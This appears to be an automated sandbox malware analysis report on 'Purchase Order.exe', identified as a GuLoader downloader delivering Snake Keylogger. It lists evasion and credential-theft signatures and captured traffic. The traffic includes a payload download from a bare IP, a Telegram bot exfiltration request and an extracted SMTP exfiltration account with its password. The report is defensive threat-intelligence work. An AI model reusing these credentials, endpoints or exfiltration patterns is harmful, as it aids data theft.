Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name: Purchase Order.exe
Analysis ID: 1538474
MD5: 46ae79c53627f188d4c316adb7635524
SHA1: 653fc3ca8b9e79295a59428fe0842ec79060fb75
SHA256: 05ca345e803d5783617f8b14194428eb79aa486e0b239ae5656847363729a703
Tags: exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "aridons@falconcables.info", "Password": "7213575aceACE@@", "Host": "hosting1.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: Purchase Order.exe Virustotal: Detection: 12% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Purchase Order.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49977 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49985 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004061FB FindFirstFileA,FindClose, 0_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0040270B FindFirstFileA, 4_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004061FB FindFirstFileA,FindClose, 4_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011F4D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011FB03
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011FCE3
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB2131h 4_2_39AB1E80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB22E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABD829h 4_2_39ABD580
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABDC81h 4_2_39ABD9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABD3D1h 4_2_39ABD128
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABCF79h 4_2_39ABCCD0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABC6C9h 4_2_39ABC420
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABCB21h 4_2_39ABC878
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB021Dh 4_2_39AB0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB0BA7h 4_2_39AB0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABFAE9h 4_2_39ABF840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABF239h 4_2_39ABEF90
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABF691h 4_2_39ABF3E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABEDE1h 4_2_39ABEB38
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE531h 4_2_39ABE288
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE989h 4_2_39ABE6E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB22D6
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB2626
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE0D9h 4_2_39ABDE30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA8E28h 4_2_39CA8B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7A5Dh 4_2_39CA7720
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA1CF9h 4_2_39CA1A50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA4471h 4_2_39CA41C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA6869h 4_2_39CA65C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAF68Eh 4_2_39CAF3C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5E81h 4_2_39CA5BD8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAD69Eh 4_2_39CAD3D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAB6AEh 4_2_39CAB3E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA18A1h 4_2_39CA15F8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5A29h 4_2_39CA5780
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAE44Eh 4_2_39CAE180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAC45Eh 4_2_39CAC190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA1449h 4_2_39CA11A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2E59h 4_2_39CA2BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0FF1h 4_2_39CA0D48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAD20Eh 4_2_39CACF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2A01h 4_2_39CA2758
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAB21Eh 4_2_39CAAF50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov esp, ebp 4_2_39CAA968
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA25A9h 4_2_39CA2300
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CABFCEh 4_2_39CABD00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA55D1h 4_2_39CA5328
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAF1FEh 4_2_39CAEF30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7571h 4_2_39CA72C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAAD8Eh 4_2_39CAAAC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5179h 4_2_39CA4ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CADFBEh 4_2_39CADCF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0B99h 4_2_39CA08F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0741h 4_2_39CA0498
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2151h 4_2_39CA1EA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAED6Eh 4_2_39CAEAA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CACD7Eh 4_2_39CACAB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA02E9h 4_2_39CA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAFB1Eh 4_2_39CAF850
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CADB2Eh 4_2_39CAD860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA4D21h 4_2_39CA4A78
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7119h 4_2_39CA6E70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CABB3Eh 4_2_39CAB870
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA32B1h 4_2_39CA3008
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA6CC1h 4_2_39CA6A18
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAE8DEh 4_2_39CAE610
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov esp, ebp 4_2_39CAA829
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA48C9h 4_2_39CA4620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAC8EEh 4_2_39CAC620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA62DBh 4_2_39CA6030
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D15A27h 4_2_39D156B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16050h 4_2_39D15D58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1079Eh 4_2_39D104D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D181C8h 4_2_39D17ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D119A6h 4_2_39D116D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1ACD0h 4_2_39D1A9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1C4B8h 4_2_39D1C1C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13996h 4_2_39D136C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1EFC0h 4_2_39D1ECC8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D110BEh 4_2_39D10DF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D194E8h 4_2_39D191F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D122C6h 4_2_39D11FF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1BFF0h 4_2_39D1BCF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1D7D8h 4_2_39D1D4E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D142B7h 4_2_39D13FE8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D169E0h 4_2_39D166E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1F488h 4_2_39D1F190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D15066h 4_2_39D14D98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D18690h 4_2_39D18398
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D11527h 4_2_39D11280
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D19E78h 4_2_39D19B80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D12756h 4_2_39D12488
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1C980h 4_2_39D1C688
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16EA8h 4_2_39D16BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D199B0h 4_2_39D196B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1B198h 4_2_39D1AEA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13076h 4_2_39D12DA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1DCA0h 4_2_39D1D9A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1CE48h 4_2_39D1CB50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13E26h 4_2_39D13B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1F950h 4_2_39D1F658
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1030Eh 4_2_39D10040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17838h 4_2_39D17540
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1A340h 4_2_39D1A048
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1E168h 4_2_39D1DE70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D14746h 4_2_39D14478
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17370h 4_2_39D17078
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D10C2Eh 4_2_39D10960
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D18B58h 4_2_39D18860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D11E36h 4_2_39D11B68
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1B660h 4_2_39D1B368
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1A808h 4_2_39D1A510
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D12BE6h 4_2_39D12918
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1D310h 4_2_39D1D018
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1EAF8h 4_2_39D1E800
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D14BD6h 4_2_39D14908
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17D00h 4_2_39D17A08
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1BB28h 4_2_39D1B830
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13506h 4_2_39D13238
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1E630h 4_2_39D1E338
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16518h 4_2_39D16220
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1FE19h 4_2_39D1FB20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D154F6h 4_2_39D15228
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D19020h 4_2_39D18D28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D41658h 4_2_39D41360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40CC8h 4_2_39D409D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40800h 4_2_39D40508
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D41190h 4_2_39D40E98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40338h 4_2_39D40040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA34A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA3490
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0027
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0356

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.130.0 193.122.130.0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49975 -> 84.38.129.16:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49979 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49976 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49981 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49985 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49987 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49980 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49978 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /efxSlCP242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49977 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49985 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
